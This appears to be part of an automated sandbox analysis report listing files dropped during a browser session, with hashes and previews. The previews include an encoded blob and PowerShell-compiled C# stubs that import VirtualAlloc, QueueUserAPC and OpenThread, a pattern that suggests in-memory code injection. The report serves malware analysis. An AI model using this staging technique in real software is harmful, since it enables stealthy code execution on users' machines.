                  Preview: eWIyeh91PBBn1Vj6e4MoNbYmvlX0N0Koo4J3vAGv1iZazzP4FH89lJcx0/t6pX6WgSwlrjhMtB7GrezNf7sN0dlDikpeZ3+D5/d/Pn7Z3j0jQ3yIfn2cqOn5AfZac11NJyWhtUvjNBBBQcjZgsHHbu3tL+bcUCJZBr7YWHAoc/yz2eugJyqyO0Bjd3SYRLcVtSbOaF3Z9pc0+PpKqslssmQndIYU+sr055wnZDaniOVq0FFHejYfMM8tSCAPmkOsLMoTk67fhTSGGn/Y/CArWXQiyMMGtK9OHYcA0xWGbsxzNpBmhLIyYA/sszkn2RgOYa9eRgVzquB+cGAJJQIJfmM3soMP0nxn3RHoCcL7eVcSYC4oQdM+4muFnKj5RZb+RgCPoRtab1wfc2JFWXf/kxXF4/+842BeDS+x2C6aeZJj7ocyOrTfdwXVV49GV6AOwnpBFv/bhqedJSYWdLV5gYlHTD6Wgbduq7FGVpYHSalrKzM8YagbIykHH3l+hoJqjlZ2Q3VNX+KngX82cNlC+CiAGWYH4H/Stf7EGf6P1haJy6yOvWE3TwujvgvVmKrZiGXuWBK8lCNomGfwTnFEyzHtXsCX1F8t2iP2rykmr0I3wLZsqLCuH/TrSQ9AjLSmOuCt8XS5Zly1LSzEyaaz6xV1fWkHqp1bLvSwTcfK7/2Tmf+B6X4coWW0CDO/3ryp4xr8CdVqxEkLafocagB+HnZq5jhIp4LOR9FqmVK8aRW8hAiROWB+lFPJkTqs0j9OhFGt9ALOb53dYd93E2ZoUMiXhdVh+seOCbPJ2KIyMWHJL8b+0xR1LV8tZpXXxKuyF29Ic3kIApMNvpf2aVmkNZ9xiutNx01n/HrnTjVxGYXDPCYJkm85lt0JCoy++ryBlx5q7m3DEyABBNm/K8xIPKckeJMPljhOcWcnS8dCN1bk7kNiTb0O2tHbKMKL3CaqhGzGGQMNTDorEsWKDd+38W6usimK5Q/A9A77LYfn
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\61e7ecfb30839[1].bin
                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  File Type:ASCII text, with very long lines, with no line terminators
                  Category:dropped
                  Size (bytes):315596
                  Entropy (8bit):5.9999382485815005
                  Encrypted:false
                  SSDEEP:6144:ovasBgj02Aq4mu85onKq7NDl3ypsoVYEJZ1VmrhI/1xO6JXeokUr4VGISRRQ:LsBg9Aj17tl309LJZ1VmuLlZzLRRQ
                  MD5:BBBD8E91C179E72AA7B70F9916CB0936
                  SHA1:B200CB57C1AC573FF2895A4EBBD2D38C0A11CFC3
                  SHA-256:94527A5DD418CC8C12477427079E1AC1F89190DD4B0D7A4BE394668B0842608F
                  SHA-512:D3DF50CA9183081E0534A37B7993AEF4524A18F0EF9CD80B692ECC9A9BDBA4AB3274335F1CAE4471CB239015C4EA2D48D228C8A20F8D05D6FF877888FBEFF122
                  Malicious:false
                  Reputation:unknown
                  Preview: eWIyeh91PBBn1Vj6e4MoNbYmvlX0N0Koo4J3vAGv1iZazzP4FH89lJcx0/t6pX6WgSwlrjhMtB7GrezNf7sN0dlDikpeZ3+D5/d/Pn7Z3j0jQ3yIfn2cqOn5AfZac11NJyWhtUvjNBBBQcjZgsHHbu3tL+bcUCJZBr7YWHAoc/yz2eugJyqyO0Bjd3SYRLcVtSbOaF3Z9pc0+PpKqslssmQndIYU+sr055wnZDaniOVq0FFHejYfMM8tSCAPmkOsLMoTk67fhTSGGn/Y/CArWXQiyMMGtK9OHYcA0xWGbsxzNpBmhLIyYA/sszkn2RgOYa9eRgVzquB+cGAJJQIJfmM3soMP0nxn3RHoCcL7eVcSYC4oQdM+4muFnKj5RZb+RgCPoRtab1wfc2JFWXf/kxXF4/+842BeDS+x2C6aeZJj7ocyOrTfdwXVV49GV6AOwnpBFv/bhqedJSYWdLV5gYlHTD6Wgbduq7FGVpYHSalrKzM8YagbIykHH3l+hoJqjlZ2Q3VNX+KngX82cNlC+CiAGWYH4H/Stf7EGf6P1haJy6yOvWE3TwujvgvVmKrZiGXuWBK8lCNomGfwTnFEyzHtXsCX1F8t2iP2rykmr0I3wLZsqLCuH/TrSQ9AjLSmOuCt8XS5Zly1LSzEyaaz6xV1fWkHqp1bLvSwTcfK7/2Tmf+B6X4coWW0CDO/3ryp4xr8CdVqxEkLafocagB+HnZq5jhIp4LOR9FqmVK8aRW8hAiROWB+lFPJkTqs0j9OhFGt9ALOb53dYd93E2ZoUMiXhdVh+seOCbPJ2KIyMWHJL8b+0xR1LV8tZpXXxKuyF29Ic3kIApMNvpf2aVmkNZ9xiutNx01n/HrnTjVxGYXDPCYJkm85lt0JCoy++ryBlx5q7m3DEyABBNm/K8xIPKckeJMPljhOcWcnS8dCN1bk7kNiTb0O2tHbKMKL3CaqhGzGGQMNTDorEsWKDd+38W6usimK5Q/A9A77LYfn
                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):11606
                  Entropy (8bit):4.883977562702998
                  Encrypted:false
                  SSDEEP:192:Axoe5FpOMxoe5Pib4GVsm5emdKVFn3eGOVpN6K3bkkjo5HgkjDt4iWN3yBGHh9sO:6fib4GGVoGIpN6KQkj2Akjh4iUxs14fr
                  MD5:1F1446CE05A385817C3EF20CBD8B6E6A
                  SHA1:1E4B1EE5EFCA361C9FB5DC286DD7A99DEA31F33D
                  SHA-256:2BCEC12B7B67668569124FED0E0CEF2C1505B742F7AE2CF86C8544D07D59F2CE
                  SHA-512:252AD962C0E8023419D756A11F0DDF2622F71CBC9DAE31DC14D9C400607DF43030E90BCFBF2EE9B89782CC952E8FB2DADD7BDBBA3D31E33DA5A589A76B87C514
                  Malicious:false
                  Reputation:unknown
                  Preview: PSMODULECACHE......P.e...S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........7r8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):64
                  Entropy (8bit):0.9260988789684415
                  Encrypted:false
                  SSDEEP:3:Nlllulb/lj:NllUb/l
                  MD5:13AF6BE1CB30E2FB779EA728EE0A6D67
                  SHA1:F33581AC2C60B1F02C978D14DC220DCE57CC9562
                  SHA-256:168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
                  SHA-512:1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413
                  Malicious:false
                  Reputation:unknown
                  Preview: @...e................................................@..........
                  C:\Users\user\AppData\Local\Temp\11mxocay\11mxocay.0.cs
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text
                  Category:dropped
                  Size (bytes):394
                  Entropy (8bit):4.954749753951787
                  Encrypted:false
                  SSDEEP:6:V/DsYLDS81zuJqvFMmMRSRa+eNMjSSRrA3/MLqevVSRN9HRRcMzy:V/DTLDfuKFMM9eg5rmMOe8nRRcQy
                  MD5:4F00714F1C09E141DB020803EA09579D
                  SHA1:D7980DF2EB35C87A8B0970CACD97DB01F3AF3053
                  SHA-256:3849E6268E834D1AE7C9D9C9A8073383600D6E3B16FCF19D4EDA5AEFD3AB702C
                  SHA-512:27A50F4C4E088993854043C472B93BB3E4D4B49942349A2A320DECD7E1F4F50FDF55C0ADAC1929626767E670B6DF94EE020CC8794D70C11CDC11D58043EF14A4
                  Malicious:false
                  Reputation:unknown
                  Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class uai. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint vjsthgo,uint ssavaddinvx);.[DllImport("kernel32")].public static extern IntPtr VirtualAlloc(IntPtr gexlvnsp,uint sjhv,uint hya,uint gdlnrobpny);.. }..}.
                  C:\Users\user\AppData\Local\Temp\11mxocay\11mxocay.cmdline
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                  Category:dropped
                  Size (bytes):369
                  Entropy (8bit):5.250930918891396
                  Encrypted:false
                  SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23f57hG9zxs7+AEszIWXp+N23f57hGY:p37Lvkmb6KHx1eWZE8x1T
                  MD5:E76EA577ABBAF50F936BA287CF51D4F9
                  SHA1:5E7343823FDF2D3147F4CC9F67318B6AB5098B44
                  SHA-256:CDCE95E9974A6D3C28283D3248CD9A8EF1B4E4A0D4F4CC0E1C405C2B387F390A
                  SHA-512:751C7D3E39C9A762875D8637FA5CF033CE3FC27C4AD2586CEB29E0021913C07BCE53FEB0CB08F392D62AD4FED9BB9C59D10FE27B4670A3B8CCE5056B1313F96D
                  Malicious:false
                  Reputation:unknown
                  Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\11mxocay\11mxocay.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\11mxocay\11mxocay.0.cs"
                  C:\Users\user\AppData\Local\Temp\11mxocay\11mxocay.dll
                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                  Category:dropped
                  Size (bytes):3584
                  Entropy (8bit):2.6001943211961662
                  Encrypted:false
                  SSDEEP:24:etGSf/W2dg85xsF2uhyjxdWJHiXE4tkZfBBy4b+WI+ycuZhNjakSFPNnq:6Wkb5xs0PWQXEvJBs4bl1ulja3fq
                  MD5:6BCA11EE2BE4B6DB112662334D1F25FA
                  SHA1:F9772D39DEAE3987C1EB643C1C30D96FB18A67F3
                  SHA-256:8F510015742554FAB6479E07C141C59701593B395373A2F978B4239656B4B3D7
                  SHA-512:4C68A644E04B25C4FBB62ABF3FEE1F05DB9D2D4F40808C848377C6EAE3559B8A3838F955FF5EFD396A83BEB0908473DCA9B6582CBE62883210A2651A82123527
                  Malicious:false
                  Reputation:unknown
                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....k.a...........!.................#... ...@....... ....................................@..................................#..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..X.............................................................(....*BSJB............v4.0.30319......l...H...#~......8...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................/.(...................................................... 6............ H............ P.....P ......].........c.....k.....w.....................]. ...]...!.].%...].......*.....3.-.....6.......H.......P...........
                  C:\Users\user\AppData\Local\Temp\11mxocay\11mxocay.out
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                  Category:modified
                  Size (bytes):869
                  Entropy (8bit):5.335370208193909
                  Encrypted:false
                  SSDEEP:24:KBId3ka6KHzE8OKaM5DqBVKVrdFAMBJTH:Ukka6AzE8OKxDcVKdBJj
                  MD5:4308EAC7B06E02BD2A64957B2AF4E82F
                  SHA1:8C9839AED3CAE603484A62564F60F6BD2F08DDB4
                  SHA-256:76D3A4A2C4C4FD18902DFEE5069BB94F810C595A3215EB3525DCF51BFA4172F6
                  SHA-512:B04C8271CB82FCA5B2C2A83F02FB92F01497D7F01F3833A8C1DD5D09A151D19BC2B6183E8BDF73ACBE6509C39E33460946DC42D26DD378520A70A08A438C9751
                  Malicious:false
                  Reputation:unknown
                  Preview: .C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\11mxocay\11mxocay.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\11mxocay\11mxocay.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                  C:\Users\user\AppData\Local\Temp\11mxocay\CSCC5AC99B8323C4ED88D9ECC76C0BE5E59.TMP
                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  File Type:MSVC .res
                  Category:dropped
                  Size (bytes):652
                  Entropy (8bit):3.1028745539769926
                  Encrypted:false
                  SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryxak7YnqqFPN5Dlq5J:+RI+ycuZhNjakSFPNnqX
                  MD5:CB9CF9636E54AC81E32844664B16B0C5
                  SHA1:A8BEDFC693A4826E80D8DBDABE852BFB342B9476
                  SHA-256:9C3E87A2B7375C241F3D96678783D7D55AD3B8ADAA03090B835A8B4D8F88FA50
                  SHA-512:0E48BA346580502BBAD15182D6925D646CE4D645571F9C0BE1C58171570AF987DE698BC37DC7F199F5922830FA6BADF495A4560A14B87CBCDA203428652879A9
                  Malicious:false
                  Reputation:unknown
                  Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...1.1.m.x.o.c.a.y...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...1.1.m.x.o.c.a.y...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                  C:\Users\user\AppData\Local\Temp\5nzflxas\5nzflxas.0.cs
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text
                  Category:dropped
                  Size (bytes):404
                  Entropy (8bit):5.001750205738985
                  Encrypted:false
                  SSDEEP:6:V/DsYLDS81zuJMQGMRSR7a1kqcmYWSRa+rVSSRnA/fepw6V2XeYy:V/DTLDfuQabYN9rV5nA/2+6V+zy
                  MD5:E67A79EEB8705BEA96347DF090918E43
                  SHA1:95FF21FB152D1292B6DCDD128421D4EC938E2D48
                  SHA-256:D808E7944F6D224E6207EAD29CB1B7DD234016FC9C0AA7B7208FC7D6233E4CD8
                  SHA-512:9F3EAD7E7320BB8D1BD336FF39A08FF2554240DD71A9C2931D8BB849B82FAF2FE14CA5222E5F3D9DC9F4897C9B4AF3AB9D05CA77924C7B3C38107A83CA85E51B
                  Malicious:false
                  Reputation:unknown
                  Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class lguxor. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr lsfjmn,IntPtr xxqh,IntPtr xyrmxbtxwnl);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint mekkcqcdoju,uint nau,IntPtr tamno);.. }..}.
                  C:\Users\user\AppData\Local\Temp\5nzflxas\5nzflxas.cmdline
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                  Category:dropped
                  Size (bytes):369
                  Entropy (8bit):5.249752581955158
                  Encrypted:false
                  SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fXSzxs7+AEszIWXp+N23fXX:p37Lvkmb6KHaWZE8/
                  MD5:925768B60B9A537FB21804693072A49A
                  SHA1:FC022A54A9A4875AFFBAB7FC3E30B9A20DCE3538
                  SHA-256:F420C31377AFD02797261875F3CB01DB674AC455B4B01DF7EBB40743BD75776E
                  SHA-512:231978A1E60E7D0C598FCA59FDDD5FA991CEB73786DDC75041EFB29C18F8E13C6755A5B5FDBE394799EFEA92AE4B1FB742342CF93464563BEC2207C4C0470CA5
                  Malicious:false
                  Reputation:unknown
                  Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\5nzflxas\5nzflxas.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\5nzflxas\5nzflxas.0.cs"
                  C:\Users\user\AppData\Local\Temp\5nzflxas\5nzflxas.dll
                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                  Category:dropped
                  Size (bytes):3584
                  Entropy (8bit):2.615837381511974
                  Encrypted:false
                  SSDEEP:24:etGSU8OmU0t3lm85z7ntQW6gfg9G4laUtkZfhBm3VUWI+ycuZhNzakSVPNnq:6uXQ3r5uJarJhUF31ulza3Pq
                  MD5:FC946B38BEA4BE8AE31E718A56582B95
                  SHA1:3C4B86BBD75DAE6762E8E1C3A28FE22783D4C134
                  SHA-256:9BA9D2814D1507671DF5C6554175A06F2FB8214EBC0D12C076071C9994837A87
                  SHA-512:B5BDA3AFD6B3F6462255831903EDB8FA744FAFDF96E4745D05C922D6DEA66C01F33FDC10133D08553B04326F526E95DA90058E678D68C667619AE323CBB6DA6E
                  Malicious:false
                  Reputation:unknown
                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....k.a...........!.................$... ...@....... ....................................@..................................#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..\.............................................................(....*BSJB............v4.0.30319......l...H...#~......<...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................2.+...................................................... 9............ F............ Y.....P ......d.........j.....q.....v.....................d. ...d...!.d.%...d.......*.....3.1.....9.......F.......Y...........
                  C:\Users\user\AppData\Local\Temp\5nzflxas\5nzflxas.out
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                  Category:modified
                  Size (bytes):869
                  Entropy (8bit):5.3275407456168615
                  Encrypted:false
                  SSDEEP:24:KBId3ka6KH7E8mKaM5DqBVKVrdFAMBJTH:Ukka6A7E8mKxDcVKdBJj
                  MD5:A25D57B00C1641A6F7A16AE40A82E7B2
                  SHA1:9FCAF763F363669E0CC90B060DA3183AE72B9DD9
                  SHA-256:D0ED793261B3AFB9E59DF0E69F32966348B4713C6CE82EEC0E9C81A0880F8EEB
                  SHA-512:094C48DB60E946B0E92DF14A3C08753129E499D81CE90B7AE2F0E7ADB90B7A249994A2AE7429B33BFD9BA8834D741B955DBA9320DD4EB9B83325394B68527826
                  Malicious:false
                  Reputation:unknown
                  Preview: .C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\5nzflxas\5nzflxas.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\5nzflxas\5nzflxas.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                  C:\Users\user\AppData\Local\Temp\5nzflxas\CSCCA0D8D115C84DA1A0293F6BF85846.TMP
                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  File Type:MSVC .res
                  Category:dropped
                  Size (bytes):652
                  Entropy (8bit):3.097209924400671
                  Encrypted:false
                  SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryU+ak7YnqqlfPN5Dlq5J:+RI+ycuZhNzakSVPNnqX
                  MD5:2906F165CE191CD0ED870B7268D26120
                  SHA1:9F18AD59158BC56ECE7CF476EA838C43F4EE0AD5
                  SHA-256:501EADA57DB6C544315F3F635DFD3D893F3E886A7700B23B2F23C48EC16D1741
                  SHA-512:00B9FE5767F0973F5DB367DB44F7AF02B58F96F0F1C1C76FE6A1DECEDBB8DF41D456763B17155848EF1325E1C02A48E37B932B3ABFD1CF0060EEE7A2C7E697C9
                  Malicious:false
                  Reputation:unknown
                  Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...5.n.z.f.l.x.a.s...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...5.n.z.f.l.x.a.s...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                  C:\Users\user\AppData\Local\Temp\JavaDeployReg.log
                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:modified
                  Size (bytes):267
                  Entropy (8bit):4.398088139297247
                  Encrypted:false
                  SSDEEP:3:oVXXOFI898JOGXnHOFIW+lOFI2OI7W8JOGXnHOFI2OINC+lOFJTNAW8JOGXnHOFx:o9+59quqMUBquUIMDTN9quDTAC
                  MD5:23E104FB8C30D1E29BCD56F8AF913256
                  SHA1:B8A04499A067980BE5EBBF1965DDE141DA8AE291
                  SHA-256:8878D9B63CCC0B9E28F387073347183776E666C12A8EFEE209331250093D6F7C
                  SHA-512:53C60B8172B940649E2FE9A1BD27E57DC7CAE83ED5434A506C060E5D9A32669C24B736106BD5AD27E05E94671078394CF30077DA5B1072222E80AF79C58F9967
                  Malicious:false
                  Reputation:unknown
                  Preview: [2022/01/19 11:50:26.586] Latest deploy version: ..[2022/01/19 11:50:26.586] 11.211.2 ..[2022/01/19 11:50:29.812] Latest deploy version: ..[2022/01/19 11:50:29.812] 11.211.2 ..[2022/01/19 11:50:36.004] Latest deploy version: ..[2022/01/19 11:50:36.004] 11.211.2 ..
                  C:\Users\user\AppData\Local\Temp\RES4702.tmp
                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols
                  Category:dropped
                  Size (bytes):1332
                  Entropy (8bit):4.005897242454003
                  Encrypted:false
                  SSDEEP:24:HqzW91gIXAK+hH2hhKfmNwI+ycuZhNPakSBPNnq92d:efLWvKfmm1ulPa3zq9G
                  MD5:D03CFDA18E6411A2D1DDF56684050E6C
                  SHA1:1203C1FD48E8AC4B4ED10965B3F4F96F2E7C7D98
                  SHA-256:FA286FBC9D5B3939556B1FB81987857D5B818723E5FF1828E6DE0F2448262654
                  SHA-512:CA76D1BC94FAAFE202E48C9901FC2E507911B1F0DD9481C6EE5095D252D48D52EDB28B78F860FD6764F2B457EBC272873E1BC91E4C6010D21939D3B03A57568D
                  Malicious:false
                  Reputation:unknown
                  Preview: L....k.a.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........T....c:\Users\user\AppData\Local\Temp\eutk2hxp\CSC3C520F3552234BD5981E8C2C19975E5B.TMP...............D.6.N...3...v...........4.......C:\Users\user\AppData\Local\Temp\RES4702.tmp.-.<...................'...Microsoft (R) CVTRES.^.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...e.u.t.k.2.h.x.p...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.
                  C:\Users\user\AppData\Local\Temp\RES49B1.tmp
                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols
                  Category:dropped
                  Size (bytes):1332
                  Entropy (8bit):3.9822008344864663
                  Encrypted:false
                  SSDEEP:24:HZzW9JLMJ79hH/hKfmNwI+ycuZhNzakSVPNnq92d:u4J7P5Kfmm1ulza3Pq9G
                  MD5:621906E7E2E135943F4AF346F6F00CB1
                  SHA1:A20D375E0AC8EEF4CEDB5E992102E2DBEDECFC13
                  SHA-256:64E79EC5AA16DC5BE735D504C566D7D1E2A9FC5EFF9D6702FFA533A24828DB18
                  SHA-512:B27C3CFBB61E3BB2223908B9386B0F5CF467B7CC3BA946542B91C77B0F510639D3AE178971AAA3F3651D1305A0C561E350DA961A4EF1CCDD002DFA18BEB6307E
                  Malicious:false
                  Reputation:unknown
                  Preview: L....k.a.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........Q....c:\Users\user\AppData\Local\Temp\5nzflxas\CSCCA0D8D115C84DA1A0293F6BF85846.TMP..................)..e......rh.a ..........4.......C:\Users\user\AppData\Local\Temp\RES49B1.tmp.-.<...................'...Microsoft (R) CVTRES.^.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...5.n.z.f.l.x.a.s...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.
                  C:\Users\user\AppData\Local\Temp\RES4D3C.tmp
                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols
                  Category:dropped
                  Size (bytes):1332
                  Entropy (8bit):3.9879745328761844
                  Encrypted:false
                  SSDEEP:24:HZzW91gz6FgKhHDhKfmNwI+ycuZhNKqYakS7qNPNnq92d:Rz7ONKfmm1ulKxa37Kq9G
                  MD5:0D6299E70F682FA23FD130E6F7F671D9
                  SHA1:D683F3859DD86B439D09DA17EDCED0DAFCBBD0CE
                  SHA-256:A50A003AA80FA35F1608C1DD27CB05AEF40D576778E940EEAFF2C772FFE1063F
                  SHA-512:5BE965C06EF00CB448B39E95CF9D4A9274EF3D0BE1BFC6D4BE1FC652AB52B13FDCF5A01D01130C516DC67455599390E9C2B2CC32E83891F64AEECFE5009A42B5
                  Malicious:false
                  Reputation:unknown
